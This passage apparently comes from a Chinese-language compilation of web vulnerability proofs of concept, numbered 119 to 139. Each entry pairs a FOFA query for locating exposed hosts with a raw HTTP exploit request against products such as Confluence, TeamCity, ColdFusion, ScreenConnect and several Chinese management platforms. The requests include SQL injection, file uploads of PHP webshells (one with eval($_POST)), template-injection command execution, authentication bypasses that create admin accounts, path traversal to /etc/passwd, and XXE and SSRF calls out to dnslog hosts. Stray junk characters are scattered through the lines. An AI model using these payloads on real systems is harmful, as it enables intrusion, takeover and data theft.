& W8 [5 `- ^2 A$ C* P5 JX-Forwarded-For: 1.1.1.1( E& s2 u7 o* K; {0 t
X-Originating-Ip: 1.1.1.1
- h# t: ]; {1 g0 G4 M; yX-Remote-Ip: 1.1.1.1
5 r2 l5 y, N* o* v6 p/ A! BX-Remote-Addr: 1.1.1.1
8 x* V4 c9 Y' hTe: trailers" B1 n3 K% t/ c; u5 |2 e
Connection: close z6 y. r4 \5 r) c
. K! S. Z3 P0 H1 s$ h6 j: I8 o
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456% v) \ _0 p- i5 Q
, {; V: U: ^1 h# C
, W/ N1 D6 i% `8 _. r6 Y120. 北京百绰智能S40管理平台导入web.php任意文件上传, K* l& M# S$ k
CVE-2024-1253! B* A7 V( k. G ?5 V+ ^: Z
FOFA:title="Smart管理平台"3 g; j! W( n. M; L, ^" j
POST /useratte/web.php? HTTP/1.1/ T; d9 h5 F% d/ k: [4 R* r0 _
Host: ip:port
( N. d6 G0 E0 ?$ M8 |, m8 J& RCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db" r! Q% d# W* }
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
8 _- q" O& |3 M6 d2 ^1 F7 J$ gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- z/ a- }$ y4 \" J) U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 Z0 X" h2 f5 s. b c" H+ W6 S; U
Accept-Encoding: gzip, deflate3 A: @4 b* S3 u! y' g
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793285 e/ D. N0 x8 W7 q
Content-Length: 597
, w$ m9 X" a; T" A' ^* j' X+ X( uOrigin: https://ip:port) k1 p5 g. d/ p
Referer: https://ip:port/sysmanage/licence.php
) S9 U& p6 m( u2 |) nUpgrade-Insecure-Requests: 15 \2 n. K) n/ h4 d: p
Sec-Fetch-Dest: document
9 P% S% h# P7 q% Q7 wSec-Fetch-Mode: navigate
, Q {/ l% |8 \Sec-Fetch-Site: same-origin
' {: q' L5 F, X0 Y+ SSec-Fetch-User: ?11 N8 F5 G5 t& T. L
Te: trailers
1 O9 u/ O+ R$ Z' S2 {Connection: close. l$ _* ?3 J7 x/ l& U
5 k& j: v4 Q1 V& @- _/ M-----------------------------42328904123665875270630079328
* g% y" c8 y* V3 x9 T, x jContent-Disposition: form-data; name="file_upload"; filename="2.php"# [& o% S) s6 W; c# ?
Content-Type: application/octet-stream+ U$ d: Y G* P+ }% z3 _/ p, h: n
# B S2 j7 v+ s8 n! h$ ~6 X& \
<?php phpinfo()?>
; r( o! h% n. }# ~: Q& u& l5 ~-----------------------------42328904123665875270630079328% r$ p1 `2 X8 Q; F: S7 @
Content-Disposition: form-data; name="id_type"
" L6 E. O3 K) V8 D8 y8 @+ S
' h' T0 |8 c F$ i2 H3 W9 F; m+ C( m10 ?* j+ A; Z; u# R2 ^
-----------------------------42328904123665875270630079328* i( m% a A9 x$ i5 v' P7 r; |
Content-Disposition: form-data; name="1_ck"1 V0 @, V3 L" a6 B4 A1 x9 f3 s
9 ]3 F% d* ~; Q+ d5 \& `1_radhttp4 ^% {1 a) J5 Y% R. I
-----------------------------42328904123665875270630079328
2 I$ Z4 `9 V5 c, N$ R/ jContent-Disposition: form-data; name="mode"
. u9 B D- ]' Z, L4 o
" j3 k& }; w8 E F! Jimport
/ i# E" q1 I! a2 [) x1 r-----------------------------42328904123665875270630079328. [/ O" z1 K2 J+ E1 Z% u+ Y
: x: E9 X+ `6 h( b
5 b5 y0 r( @( H$ @文件路径/upload/2.php
% K% Q) O$ G, G5 }; D) A- [; g' P8 _7 r
121. 北京百绰智能S42管理平台userattestation.php任意文件上传0 S5 z" v; c0 }
CVE-2024-1918$ `2 Q& n7 \ X5 R3 H
FOFA:title="Smart管理平台"" D6 b/ M. g. A6 w6 t8 I2 l3 x
POST /useratte/userattestation.php HTTP/1.1 {$ J5 B& Y0 D& t( E5 M( _
Host: 192.168.40.130:8443
) e# c9 P' S) {: z3 QCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50, y, S# K& ?5 G
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko3 Y/ N$ [0 L F( {) x6 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 d+ Y$ q* j5 f% ^2 n" b, H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ g7 ?' a) z @6 I9 ]0 d$ s
Accept-Encoding: gzip, deflate
& @! q& `3 h. F5 ]' zContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
% k6 T6 S, f/ w( G1 k, IContent-Length: 592" e9 I" e- y7 ^4 s n& ~0 i$ w
Origin: https://192.168.40.130:8443
, _/ P# G7 l; E4 i/ w8 M& TUpgrade-Insecure-Requests: 1( ?# \ Y. ^) s& w Z3 a
Sec-Fetch-Dest: document
9 n4 u4 v/ N/ [: y) KSec-Fetch-Mode: navigate
4 S3 k5 {6 _4 O! xSec-Fetch-Site: same-origin
) Q" P! T3 y$ X8 `! GSec-Fetch-User: ?1
. ~* P. g$ T! A7 H; s# R1 sTe: trailers" C j2 j( w6 J, u) N+ [" K
Connection: close
3 ^+ ]1 l" W' I2 i% L, h8 z( Z# z' @4 m; b& I
-----------------------------423289041236658752706300793286 A2 J) H2 q7 x- R. s
Content-Disposition: form-data; name="web_img"; filename="1.php": o& ` V/ F' X. |
Content-Type: application/octet-stream
: W2 T8 t8 B6 x4 Y" t% H* j+ [; ~. P' }. a3 d/ p5 N; y; d
<?php phpinfo();?>, X) q1 z, n, y! z9 F/ d) ~
-----------------------------42328904123665875270630079328
- F( B* ?6 I0 T% D4 N- t* LContent-Disposition: form-data; name="id_type"5 e J4 v& d3 ^% z( U2 a
6 G6 E) D- }8 c! `7 O. `$ [
1
' r1 t# }4 G( l2 r-----------------------------42328904123665875270630079328
, ]8 j1 Y5 S5 l! P' Z. EContent-Disposition: form-data; name="1_ck"
4 t) v( ~- P3 n9 ?3 E+ s4 D/ U) h4 P
1_radhttp
+ T9 Y v2 l; s( }3 q# s-----------------------------423289041236658752706300793280 x0 S& t* k" t# q5 x
Content-Disposition: form-data; name="hidwel"
* M4 o3 [0 M; z, L
" F" }6 `" r. l3 A9 z( hset
& D& f% V0 `9 M8 m5 [-----------------------------42328904123665875270630079328
/ F# K# w5 I% X+ d6 z& o& S$ y( v
3 W9 s- C5 H" v, T8 r
9 v9 K9 g& ^8 W# [boot/web/upload/weblogo/1.php
: m, V; f: F8 q- d1 k1 |1 E: f7 m# D( i* l' `0 N
122. 北京百绰智能s200管理平台/importexport.php sql注入/ H3 @; D3 } y. `# o* G4 K
CVE-2024-27718FOFA:title="Smart管理平台"3 ~6 z, B! d& d! U# K0 W
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
8 y# `4 Q" s6 C# ^$ J' s( SGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
/ d5 Q, e5 P1 _+ Q, f% D. \1 OHost: x.x.x.x/ |. x, g. R; ^5 S8 A) g
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
6 z. B" O# a lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 ~! Z- @3 s i* g9 B8 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( ?. [% [' o! t; B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, _; S8 Y5 _6 ?8 `$ qAccept-Encoding: gzip, deflate, br' x+ ~- F) E5 L. P2 O
Upgrade-Insecure-Requests: 11 {3 u' j: u# ]1 `
Sec-Fetch-Dest: document
1 e3 m% q9 ^9 ~: _4 TSec-Fetch-Mode: navigate
7 k" R, ?+ ]) k; N# n \Sec-Fetch-Site: none
! n& u7 Y" f( C( hSec-Fetch-User: ?1
- k. Q; h" a) _) i" W$ m3 aTe: trailers
( i8 J9 i% m# ?3 S- \ H; OConnection: close. L: s& E8 Y* m; ]8 L
" _# t6 Z7 Y! b+ q
" e d$ k8 @0 S123. Atlassian Confluence 模板注入代码执行5 B% h2 {! f" E) w. ~% o& n4 ?
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
) V* r; G7 \# w# |: r2 l6 k# RPOST /template/aui/text-inline.vm HTTP/1.1" \: L3 g1 w5 {6 X g$ P
Host: localhost:8090
0 T- G1 G a' KAccept-Encoding: gzip, deflate, br
' c# Y8 B- m6 R& N$ J% _' qAccept: */*
, e. X& y. a+ W# u2 TAccept-Language: en-US;q=0.9,en;q=0.8" W. O! g" A2 [2 G" W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
1 M! D% v! u/ \ g) ~9 U8 M$ d# yConnection: close
+ ^+ u' b6 ?' \: Y5 o" IContent-Type: application/x-www-form-urlencoded1 j8 ^! I; ?$ `- F' m: v
/ ?, b4 m% j. A5 m2 @label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
% v* Z" q( R L0 `0 M) E* k g
6 d5 S% d3 k' Q8 w, a! i8 K9 s0 ~2 ~$ ?* d2 ], W
124. 湖南建研工程质量检测系统任意文件上传& G2 P! [ z! G" I5 D' G
FOFA:body="/Content/Theme/Standard/webSite/login.css"
( _# o) T6 c; C( A. O; CPOST /Scripts/admintool?type=updatefile HTTP/1.1
- j- t0 ~" @& WHost: 192.168.40.130:82824 u4 S0 g* ?8 B) P2 d% @
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36& A3 s, Y. |: g
Content-Length: 729 r/ n4 R, _- ?4 i: A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8& [$ S" E: d: z- S$ A" \! Y; w
Accept-Encoding: gzip, deflate, br
: |% p }9 U7 T# }) pAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; m& |0 j7 A9 T E) x$ c) U e
Connection: close
4 ^0 O$ f; Q( rContent-Type: application/x-www-form-urlencoded
" U5 [. F% ~0 D( R% i1 l
~) U+ ~" F8 F Q/ j7 c+ p( G$ `: sfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>& k, Q2 u$ O. d! n' p& ?
( v% v3 O) |# v3 l( k8 [" u( w v0 B. G/ S' m5 Q
http://192.168.40.130:8282/Scripts/abcgcg.aspx$ _; H0 {2 S$ } |% Y
0 y5 ~0 F; n c* }. p A3 q* d125. ConnectWise ScreenConnect身份验证绕过7 k$ r% @0 J* G3 d; E; N1 Y
CVE-2024-17093 c4 |, f2 ^4 p
FOFA:icon_hash="-82958153", i! c& W5 S' G J) C" i/ R
https://github.com/watchtowrlabs ... bypass-add-user-poc* M* G0 D1 t; v8 ^( e9 v- v+ o3 c
& t B8 ` X: h" o- G) i v6 y) y; v6 u' g& r1 {: ^
使用方法
* C% F. v9 l* y0 b8 \; z, Zpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
, O( e2 P; y# F
, _: Q4 w7 y2 ^) ^5 t4 A, l2 Q# n" I/ r3 O
创建好用户后直接登录后台,可以执行系统命令。
0 y0 z! x7 y$ N* l+ u! Z& d5 k, I. N( e- T
126. Aiohttp 路径遍历
. K2 Y9 v Y0 U9 CFOFA:title=="ComfyUI"
3 w V- R" R; ~8 ?8 Y, s! gGET /static/../../../../../etc/passwd HTTP/1.14 y* p* P' l9 V# Y8 v8 F( X
Host: x.x.x.x7 a2 _. M1 }" E5 ]2 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
' |" u0 E l# ~) M7 YConnection: close
# S+ I+ W% e, [% Q. R) U( uAccept: */*
L( b7 i3 d" l$ YAccept-Language: en
4 ]9 m+ V- \& w' l* L% ?0 yAccept-Encoding: gzip% T, E) ]( O9 A( r* l9 r H; l% L
5 |8 u: [/ ?' Q4 V7 o
2 Z* Q7 R2 @- J0 Q7 W7 x+ G
127. 广联达Linkworks DataExchange.ashx XXE
& u* s7 f3 F! m0 BFOFA:body="Services/Identification/login.ashx"
% N' J. |: k' h: s, i- k1 ePOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
" |) A; ? t; mHost: 192.168.40.130:8888# G! H) U8 x# V/ {% G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36/ @) ` O: x! J6 u& ~& {( e% B3 V
Content-Length: 415' }# U7 @( ?% G5 [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 `) W* ]4 P& W o' l6 ]9 z
Accept-Encoding: gzip, deflate
" ^( n x2 t) V& iAccept-Language: zh-CN,zh;q=0.9( ~- u' c+ K- \% p* c2 E& V# U' J
Connection: close: _% X! q% g( T* D/ ~
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
; @7 v1 ]: a* V+ MPurpose: prefetch
" R/ z4 Z1 a% c) B) W8 b& ]Sec-Purpose: prefetch;prerender( ?1 q* Y' ]# `: T3 v
/ q% a9 T+ c2 q; s------WebKitFormBoundaryJGgV5l5ta05yAIe0
1 T! h2 j4 {6 G4 b2 WContent-Disposition: form-data;name="SystemName"
9 @- u) y. ^0 l X4 v& b3 D" j
/ F) P& N6 E( N; Y; ^BIM
1 x+ Y$ X1 {( z" p, _------WebKitFormBoundaryJGgV5l5ta05yAIe0
0 ^/ l P+ f! H/ nContent-Disposition: form-data;name="Params"" e8 w5 I) S( I- S
Content-Type: text/plain0 O* w8 q1 I% u
+ G" E$ X/ W" N9 H N% c6 q
<?xml version="1.0" encoding="UTF-8"?>, d6 }7 }0 g7 J& B( z9 c( ^
<!DOCTYPE test [ Y* L9 E7 A N0 B5 ^4 u
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
9 \$ }. F# G1 m]1 M9 N \1 R* P* u0 }( |+ W- A
>' ]- X1 R: v, n8 w* _2 q' R! F
<test>&t;</test>: ^$ o" s- P5 B4 f2 Y
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
/ j$ V3 f. w( M
/ M/ d: Q5 a' o/ w: T; ~8 e1 R0 M& @8 u; y r
+ r) F1 Z5 m" Q( T' S128. Adobe ColdFusion 反序列化. x" r/ f% i* l- B9 M
CVE-2023-382037 y$ J3 a7 U- K8 d
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
* v# ^6 a. O) C7 M/ g1 S- DFOFA:app="Adobe-ColdFusion"0 I& S! B9 ?2 t( V7 _/ `
PAYLOAD& D5 D, v/ T& v9 i% j& Q8 W# p4 e
# v5 m4 w6 [6 J# b2 m. W) w129. Adobe ColdFusion 任意文件读取
/ u8 b$ l b0 a4 \3 X% M$ G1 ZCVE-2024-20767/ M. V5 c# d7 }8 t1 v" k
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"( E/ }1 \7 A& W; W% \0 s/ T! x
第一步,获取uuid
) V/ E: S$ ^ R! W7 y7 |GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1; w1 X1 S/ B& L: s* m; A
Host: x.x.x.x4 t2 D7 G6 l1 x& P; v0 b9 o% Z" ~3 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 a' r. U: t- t+ a8 q7 ^$ M& p
Accept: */*
+ b( f' F4 P- H$ BAccept-Encoding: gzip, deflate
# [# _' H- z1 p/ L, IConnection: close% v G4 w3 _, l' J5 q2 v& a
5 ]9 t2 n X% ]1 z
, ^, I' @2 Y8 u0 s/ h第二步,读取/etc/passwd文件
) U/ x, ^. W3 S- H MGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
4 `6 \4 Z: @# g+ H* j! eHost: x.x.x.x
4 G1 h+ ?* t( A( o2 x$ K" C) ^* kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36- E# d( ]" V6 l7 x9 E; g
Accept: */*
/ k. ^# E- e2 S0 ?) qAccept-Encoding: gzip, deflate
( g C' H# ?* E' S0 BConnection: close+ R3 L" ?! U! S5 _' i; e
uuid: 85f60018-a654-4410-a783-f81cbd5000b9( a2 N* e( L, @( Q) ?" Z3 w
' l; G& `5 L d0 @7 N
) p j, w0 I) \# D" I
130. Laykefu客服系统任意文件上传
: S8 d j0 I$ O5 jFOFA:icon_hash="-334624619"0 a, @, \3 O' B5 a+ b$ K1 j2 c3 G
POST /admin/users/upavatar.html HTTP/1.14 G: J1 m. o! N
Host: 127.0.0.1
5 g1 X8 Y3 m6 B( qAccept: application/json, text/javascript, */*; q=0.01
) f2 d! v! d R/ e: ^' \X-Requested-With: XMLHttpRequest
( G# {- R' k6 q. i9 F; qUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
7 A/ r, M7 j0 n0 S |8 n4 WContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR" I7 ~5 Q. h& s( Z) Y1 E1 y$ o) b/ I0 f! J
Accept-Encoding: gzip, deflate
! n+ Y! i/ }# H8 a! EAccept-Language: zh-CN,zh;q=0.9
8 b' u1 ^7 {( P" K }4 bCookie: user_name=1; user_id=37 x1 a5 v4 j5 G q; R. p
Connection: close# x6 @* V/ n8 |9 U
- s/ @7 Q5 z" R
------WebKitFormBoundary3OCVBiwBVsNuB2kR8 F9 o" `. c) u
Content-Disposition: form-data; name="file"; filename="1.php"1 ~* @4 c+ O! k* k- Q& N1 J
Content-Type: image/png
3 l! |+ G2 k6 U# _
' g8 Y% x8 Q+ [- Z& G<?php phpinfo();@eval($_POST['sec']);?>0 j' R. `( M7 z, F: z I9 g" m
------WebKitFormBoundary3OCVBiwBVsNuB2kR--5 L D! d0 L6 d- V* N; Z" i- {
& ?* @% _1 v" G/ g7 t/ U4 c
- O# [2 S* w2 F0 I131. Mini-Tmall <=20231017 SQL注入
" J1 Z, N7 U( t$ ?( n8 W+ nFOFA:icon_hash="-2087517259"
5 L7 y- `+ o# [ Q3 j- f后台地址:http://localhost:8080/tmall/admin- e2 t3 _! I2 b; v8 [1 C0 h: _
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
3 q) q9 f, W( E$ `" F% ^' Q, D4 |+ A) S- _& \
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
1 A/ ?6 m) A7 |( Z7 L. ^CVE-2024-27198
I( \& D& d$ oFOFA:body="Log in to TeamCity"
* ~# K4 ?1 q8 |4 ?POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
+ l- i0 H9 s3 z4 d' H& mHost: 192.168.40.130:8111+ `: I* Z+ w3 ?1 N- m; E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
9 ~! g8 ]& m! G: D. Y% XAccept: */*
9 e5 z! x8 T* X- U* Z9 LContent-Type: application/json
0 c, G+ B/ k% I. I3 V# ~, w8 ^Accept-Encoding: gzip, deflate5 `. d }8 r* y$ F
$ s" y( l% f* Q3 L% k5 Y% P) ~{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
5 E% q$ T. J. N' G
/ v8 u: ^5 i! A2 N! o
* {0 t) P& u, [( `$ x9 @CVE-2024-271993 ^$ `( N# B% u8 Y" h
/res/../admin/diagnostic.jsp4 K2 q) l$ t: }1 H0 L! C" p
/.well-known/acme-challenge/../../admin/diagnostic.jsp, X& y- e# Y/ I1 Q
/update/../admin/diagnostic.jsp
* q8 [4 T+ j" }3 O. G' @9 O& C
3 ^% _: W- J4 y3 l& `
' n& G# |$ L; r! t1 d qCVE-2024-27198-RCE.py" w! N+ V; \+ l' f5 E/ K1 S5 n
W& A) d0 x+ N! t- ?$ S5 d. k5 i
133. H5 云商城 file.php 文件上传
0 K0 v! N4 o3 d9 ^' ^5 ~7 ~+ LFOFA:body="/public/qbsp.php"
1 _) ^. w. t6 }8 F# q# n" \$ ]POST /admin/commodtiy/file.php?upload=1 HTTP/1.1. R* w& s9 V7 Z- o% t: E# `
Host: your-ip% V$ I: X+ w+ d9 M( C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
! }# t D# [3 r: R' r. k' E JContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
1 _9 u5 K2 m0 G; N' O
4 v& y0 h" M% R7 a------WebKitFormBoundaryFQqYtrIWb8iBxUCx/ ?. `7 B4 M8 H% k4 |! r( ~- ~
Content-Disposition: form-data; name="file"; filename="rce.php"
; m3 g; c/ F4 S7 s. {3 AContent-Type: application/octet-stream
4 v* s* g+ e l3 s! B7 i ! O$ R/ E; F2 [$ `, ?
<?php system("cat /etc/passwd");unlink(__FILE__);?>
7 F* U- Y& \7 W- O E5 z------WebKitFormBoundaryFQqYtrIWb8iBxUCx--4 V5 x0 F2 s' w6 W* x+ ~
4 [: u3 l2 y- K9 U- \+ M Z( g$ W+ ~ d* @/ w
0 O: _' B8 r" D5 g) i
134. 网康NS-ASG应用安全网关index.php sql注入
7 D- m; K; I2 C+ d. ~; e" C# ?CVE-2024-2330
) F3 F I3 N U6 e! |, p/ T. q9 m lNetentsec NS-ASG Application Security Gateway 6.3版本
: `. Y* q& d% l, ~) G% dFOFA:app="网康科技-NS-ASG安全网关"
* [( ^8 ]+ }) c4 ^/ _POST /protocol/index.php HTTP/1.1: { G9 x Q8 c& E1 a: }
Host: x.x.x.x8 |$ a2 F$ Z% E) o" g" e
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
; C; Y9 N3 K2 {/ S" Y1 o: fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0* M* f( z9 C' x
Accept: */*, \( w, v5 u9 p) [" s/ f: ^9 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 }* J' L$ h. a7 F! u9 l% L2 v
Accept-Encoding: gzip, deflate3 A r4 R9 O- a" w/ |
Sec-Fetch-Dest: empty
2 ]6 v6 O9 v: B3 fSec-Fetch-Mode: cors
0 Y- k* {$ n& z" p& X) N: w; jSec-Fetch-Site: same-origin
$ T- m/ ~( U. t/ B$ {Te: trailers/ }( ?$ @; r" T
Connection: close
/ B) q) g. L% b1 W# zContent-Type: application/x-www-form-urlencoded
+ S/ ]% z7 N# N3 Z) dContent-Length: 263
% @) \! u3 V+ T; G4 ^0 s9 _# r W" L) E: k- ^
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}: ?5 R( t; Z9 u
4 \( B/ y. f# h+ c' [8 X
5 C6 i* c. \" l4 |! m& k
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入2 e0 s4 _; l4 s# `, t4 ?' I J) ], y
CVE-2024-2022
2 _- b% n# z* s* P6 QNetentsec NS-ASG Application Security Gateway 6.3版本
* Y$ }& J2 Z$ ?2 KFOFA:app="网康科技-NS-ASG安全网关"
' o0 ]+ r) E% I- aGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
: R0 {- s/ A2 @& x2 p6 U: PHost: x.x.x.x
2 ~4 i- W1 U. S& H. YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
3 \9 r, T( y1 R, f UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 X$ Y0 y% R7 q% J6 A7 f7 I
Accept-Encoding: gzip, deflate
" o# `7 P& d+ t$ H" L. xAccept-Language: zh-CN,zh;q=0.9; }+ q8 G& ]# H& B0 c
Connection: close1 i$ O" a. @- R: L v4 A8 _# V
. A/ s8 W1 [+ G9 k, r; x, }
2 r. Q$ u! n7 l% O, J/ d136. NextChat cors SSRF1 ^) v( a% x. J! x% z! B
CVE-2023-49785% |. \1 d c9 G/ U- q/ F# D( N
FOFA:title="NextChat"- A- W, e9 R0 _( {
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1, a# P( Y$ Z b) T0 T% I
Host: x.x.x.x:100006 d) N4 U, I7 s/ H3 v6 t% q/ a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 x6 m( d- Q. |/ P; DConnection: close
; d9 y" F' i8 O" K4 ~Accept: */*5 `3 v/ M: x8 W5 [
Accept-Language: en
" {+ i A5 d' P0 TAccept-Encoding: gzip" A/ W; S% N8 T8 D
, ^* H. ]/ T6 `- a/ @9 Z
7 o4 u! r( A, [5 b9 v: L6 ]5 K137. 福建科立迅通信指挥调度平台down_file.php sql注入5 `, I7 k* h% b T g% g
CVE-2024-2620
5 ~+ X h2 `- w' M* O# T" c' kFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"7 i% _. Y' q& u6 K, ?; Q3 n0 e! T+ M
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
8 R" W$ t: w; L0 L$ ~2 JHost: x.x.x.x
3 I# D" P+ o* X5 S+ I" W7 J& ?' qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
2 K- _3 b3 Q. M3 k4 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 N# z, E; f* d9 Z- j& CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" R( B; M/ c S0 f# {: E8 zAccept-Encoding: gzip, deflate, br; v, s- F6 x* d8 r
Connection: close: }, V% H5 p, h: r/ r1 v( Z
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj* x, u. r/ ?; D" [! V
Upgrade-Insecure-Requests: 1
1 Z- a- ] B! Y) ] M# D& @9 F
! w' |# ^/ R. @, N) ^* I* N. e- Y, ]# @0 G
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入% t$ } o7 V% ]3 H$ e9 }3 [
CVE-2024-2621
) [4 L- R" K+ I. j P; mFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
/ V* v5 o2 p3 x% ZGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
5 q6 ?7 v$ ^3 h6 pHost: x.x.x.x2 U( I) l! c; B4 ^1 V& E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
& H6 Z* F' K; O Q8 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 X1 l% h3 z; Z$ Z+ ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& O. J8 E" k3 l, N2 _Accept-Encoding: gzip, deflate, br9 l5 w0 [* u D6 w' d, b# s
Connection: close5 C0 ^( ?# ~% |% V
Upgrade-Insecure-Requests: 14 g' T; [/ p3 Z& C3 }' a
/ }, ~+ `' x% t$ P1 y* X* V4 I7 R" R. e# R2 C
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
